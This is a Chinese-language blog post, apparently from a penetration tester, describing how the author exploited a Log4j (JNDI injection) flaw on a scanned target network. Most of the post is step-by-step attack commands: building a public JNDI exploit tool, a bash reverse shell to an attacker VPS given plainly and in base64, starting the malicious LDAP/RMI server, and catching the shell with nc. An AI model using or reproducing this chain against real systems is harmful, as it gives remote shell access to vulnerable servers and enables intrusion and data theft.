最近又是领导的任务,上来就给了一个C段啥也没给。
那就只能祭出awvs扫扫扫了,结果还真扫出来一个Log4j,心中大喜,这波稳了。

正片开始

先上dnslog
老规矩测一下dnslog,果不其然有回显。

准备JNDI注入工具
此过程将源码打包,需要java和mvn环境

1、java安装
参考此篇文章

https://blog.8owe.com/509.html

2、mvn安装
下载源码文件

https://maven.apache.org/download.cgi

随后解压文件

tar -zxvf apache-maven-3.8.5-bin.tar.gz     //此文件可能版本不同,请不要完全复制

解压完成后配置环境变量

vi /etc/profile
# 最后追加这两行
export MAVEN_HOME=/root/apache-maven-3.8.5
export PATH=$MAVEN_HOME/bin:$PATH
# 重新加载配置文件
source /etc/profile

操作完后执行mvn -v,如果有回显就证明配置完成

Apache Maven 3.8.5 (3599d3414f046de2324203b78ddcf9b5e4388aa0)
Maven home: /root/apache-maven-3.8.5
Java version: 1.8.0_322, vendor: Red Hat, Inc., runtime: /usr/lib/jvm/java-1.8.0-openjdk-    1.8.0.322.b06-1.el7_9.x86_64/jre
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "3.10.0-1160.53.1.el7.x86_64", arch: "amd64", family: "unix"

3、下载Exp

git clone https://gitee.com/Lemon_i/JNDI-Injection-Exploit.git

进入目录打包

mvn clean package -DskipTests

4、准备反弹shell
反弹shell有很多种,这里博主选择最简单的bash反弹
payload:

bash -i >& /dev/tcp/VPS IP/9527 0>&1

base64编码:

YmFzaCAtaSA+JiAvZGV2L3RjcC9WUFMgSVAvOTUyNyAwPiYx

5、进入target目录利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar开启ldap环境

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9WUFMgSVAvOTUyNyAwPiYx}|{base64,-d}|{bash,-i}" -A "VPS IP"

jndi生成payload

rmi://VPS IP:9527/ExploitBypass 

6、开启监听

nc -lvvp 9527

7、添加payload到数据包并重放

8、nc收到反弹shell

点到为止。

Last modification:June 12th, 2022 at 09:39 pm